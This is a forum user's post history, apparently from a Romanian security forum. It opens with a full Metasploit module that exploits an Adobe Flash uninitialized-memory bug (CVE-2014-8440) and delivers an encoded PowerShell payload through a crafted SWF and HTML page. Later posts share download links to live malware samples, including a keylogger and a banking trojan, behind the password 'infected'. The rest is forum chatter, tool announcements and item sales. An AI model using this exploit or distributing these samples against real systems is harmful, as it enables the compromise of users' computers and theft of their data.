Aerosol

Everything posted by Aerosol

  1. ```ruby
     ##
     # This module requires Metasploit: http://metasploit.com/download
     # Current source: https://github.com/rapid7/metasploit-framework
     ##

     require 'msf/core'

     class Metasploit3 < Msf::Exploit::Remote
       Rank = NormalRanking

       include Msf::Exploit::Powershell
       include Msf::Exploit::Remote::BrowserExploitServer

       def initialize(info={})
         super(update_info(info,
           'Name'                => 'Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory',
           'Description'         => %q{
             This module exploits an unintialized memory vulnerability in Adobe Flash Player. The
             vulnerability occurs in the ByteArray::UncompressViaZlibVariant method, which fails
             to initialize allocated memory. When using a correct memory layout this vulnerability
             leads to a ByteArray object corruption, which can be abused to access and corrupt memory.
             This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 and IE11 with
             Flash 15.0.0.189.
           },
           'License'             => MSF_LICENSE,
           'Author'              =>
             [
               'Nicolas Joly', # Vulnerability discovery
               'Unknown', # Exploit in the wild
               'juan vazquez' # msf module
             ],
           'References'          =>
             [
               ['CVE', '2014-8440'],
               ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb14-24.html'],
               ['URL', 'http://malware.dontneedcoffee.com/2014/11/cve-2014-8440.html'],
               ['URL', 'http://www.verisigninc.com/en_US/cyber-security/security-intelligence/vulnerability-reports/articles/index.xhtml?id=1081']
             ],
           'Payload'             =>
             {
               'DisableNops' => true
             },
           'Platform'            => 'win',
           'BrowserRequirements' =>
             {
               :source  => /script|headers/i,
               :os_name => OperatingSystems::Match::WINDOWS_7,
               :ua_name => Msf::HttpClients::IE,
               :flash   => lambda { |ver| ver =~ /^15\./ && ver <= '15.0.0.189' },
               :arch    => ARCH_X86
             },
           'Targets'             =>
             [
               [ 'Automatic', {} ]
             ],
           'Privileged'          => false,
           'DisclosureDate'      => 'Nov 11 2014',
           'DefaultTarget'       => 0))
       end

       def exploit
         @swf = create_swf
         super
       end

       def on_request_exploit(cli, request, target_info)
         print_status("Request: #{request.uri}")

         if request.uri =~ /\.swf$/
           print_status('Sending SWF...')
           send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
           return
         end

         print_status('Sending HTML...')
         send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
       end

       def exploit_template(cli, target_info)
         swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
         target_payload = get_payload(cli, target_info)
         psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
         b64_payload = Rex::Text.encode_base64(psh_payload)

         html_template = %Q|<html>
         <body>
         <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
         <param name="movie" value="<%=swf_random%>" />
         <param name="allowScriptAccess" value="always" />
         <param name="FlashVars" value="sh=<%=b64_payload%>" />
         <param name="Play" value="true" />
         <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>" Play="true"/>
         </object>
         </body>
         </html>
         |

         return html_template, binding()
       end

       def create_swf
         path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-8440', 'msf.swf')
         swf = ::File.open(path, 'rb') { |f| swf = f.read }

         swf
       end

     end
     ```
     Source
  2. NOTE: The source code of this project has been released into the public domain and is made available at github.com/decomp. This paper was written for the Final Year Engineering Project at Portsmouth University during the academic session 2014 - 2015. Poster The following poster summarises the project outcomes. It was created for a student project conference which was held at Portsmouth University on the 18th of March 2015. Link: https://github.com/mewpaper/decompilation
  3. mentioned in a nytimes article that schneier linked to. Two samples (prod + dev), for OSX and Win32. Does anti-vm, has some keylogging support, etc. Can't seem to attach, so here's a zippyshare link. Zippyshare.com Pass: infected https://www.virustotal.com/en/file/b27d29f30ecac80e15993fd1ba670bdcfc60f986e60d54e6a0cfb10f1c27bbc9/analysis/1430392133/ https://www.virustotal.com/en/file/48b36cedebe6d883f43b83e677449fc684f1eda4f8d63ab4eaaa3d4877389b85/analysis/1430392219/ Source
  4. Reports by Eset: Unboxing Linux/Mumblehard: Muttering spam from your servers http://www.welivesecurity.com/wp-content/uploads/2015/04/mumblehard.pdf Download Source
  5. Hello, I have attached the sample mentioned in Trendmicro's blogpost. It uses the same technique as the malware in Operation Emmental. Hope the community finds this sample useful More info: TROJ_WERDLOD: Another Banking Trojan Targets Japan https://www.virustotal.com/en/file/c2758245cbe7fe0fa586267f79de36a8960622074f6b95db2d633df31d301363/analysis/ Link: Download Pass: infected Source
  6. ArkDasm
     ArkDasm is a 64-bit interactive disassembler and debugger for Windows.
     Supported file types: PE64, raw binary files.
     Supported processor: x64 architecture (Intel x64 and AMD64)
     ArkDasm is released as Freeware.
     Current version: 1.0.0 (April 19, 2015)
     Main features:
       • parsing PE32+ imports, exports, resources
       • subroutine stack data (arguments, local variables) recognition
       • loading local debug symbols (.pdb file) using DIA
       • multiline comments support
       • bookmarks support
       • python script support
       • possibility to save, load database
     What's new:
       • added debugger capabilities
       • added new commands: bp, ba
       • switched to the Capstone disasm engine
       • updated Qt to 5.4.0
       • switched to Visual Studio 2013
       • minor improvements, bug fixes
     Link: ArkDasm
  7. @roxorlol what are you trying to say with this thread? I don't understand. From what I can see, you have fairly good speed on both download and upload. (If the upload speed is lower than the download speed, that is NOT a problem.)
  8. @Dorel6x I sent you one of my accounts, check your PM!
  9. @Facepalm if you pay attention you will learn a lot of useful things. Useful tip: don't pay attention to every spiteful comment. On:// Welcome!
  10. Hello and welcome to RST.
  11. @bDyds I told you, send me a PM with the ID and we'll discuss further.
  12. @AGSQ yes, I was wrong to use "Proof of concept"... I meant to say evidence.
  13. Hello and welcome, nice introduction.
  14. @quadxenon you've earned yourself a report for off-topic + personal attack. + I'm going to order a PC; what I do is none of your business!
  15. Ticket - Operation Vanguard Price: 10€ AUG | Copperhead Price: 1€ USP-S | Blood Tiger Price: 0,50€ MP9 | Dart Price: 0,50€ Payment method: PayPal or Telekom/Orange/Vodafone prepaid card. And many other weapons, details via PM!
  16. Well, Windows 7 Ultimate on 1 PC and 1 laptop (for gaming) and Kali Linux (for various tasks) on an older laptop.
  17. @albertynos you say you only want to use it for Facebook and YouTube? Windows XP, and use it in "Safe mode with network" and you won't have problems. It will look something like this:
      Or disable visual effects:
      To change Windows visual effects
      You can turn specific Windows visual effects on or off. For example, you can display shadows under menus to give a three-dimensional (3-D) effect, indicate folder types with watermarks, and increase the size of icons. You can change some visual effects in Display Properties and others in System Properties in Control Panel.
      Change visual effects in Display
      Open Display in Control Panel. On the Appearance tab, click Effects. In the Effects dialog box, select the check box for those items you want to turn on.
      Note: To open Display, click Start, click Control Panel, click Appearance and Themes, and then click Display. For information about a specific item, right-click the item and then click What's This?.
      Change visual effects in System
      Open System in Control Panel. On the Advanced tab, under Performance, click Settings. On the Visual Effects tab, click Custom. Select the check box for those items you want to turn on. Clear the check box for the items you want to turn off.
      Note: To open System, click Start, click Control Panel, click Performance and Maintenance, and then click System.
      Ref to:
      https://www.winhelp.us/disable-visual-effects-in-windows.html
      https://www.microsoft.com/resources/documentation/windows/xp/all/proddocs/en-us/display_change_visual_effects.mspx?mfr=true
      You can also find something useful for your problem here:
      https://www.microsoft.com/resources/documentation/windows/xp/all/proddocs/en-us/display_change_visual_effects.mspx?mfr=true
      It will help you a lot.
  18. Come on, @Twiff, you said you'd keep it private, what's this?
  19. Man, the title "Loan sharks or hackers" doesn't fit, but this one does: "Young, Nigerian & poor" :) As for the email, it's 100% cheap spam; surely there are many who fall for traps like this...
  20. Hello blackguy and welcome to the community.
  21. Hello and welcome, although you didn't post in the right place: Video: -> https://rstforums.com/forum/97780-video-cracking-wpa-wpa2-kali-linux-verbal-step-step-guide.rst
  22. Pretty interesting news (and at the same time frightening), I mean, really, the heat emitted by the PC? o.O LOL @quadxenon how about you stop making pointless comments and mind your own business? Yes, I'm amazed because the method is quite ingenious. I know I posted it myself, that's why I commented too.
  23. I bought it, trustworthy guy, I recommend him!
  24. I don't understand why you're butting into my thread for no reason, one about dislikes, one about the price, one about who knows what. Bro, read the rules; so I should pay 200$ and sell it for 30$? Then I'd rather keep it. I set a price; whoever wants to buy, fine, whoever doesn't, ALSO FINE, I'm not forcing you...
  25. @wildchild The PMs in which he swears like a child were also sent today, and all this just because I gave him 1 dislike where it was deserved. )))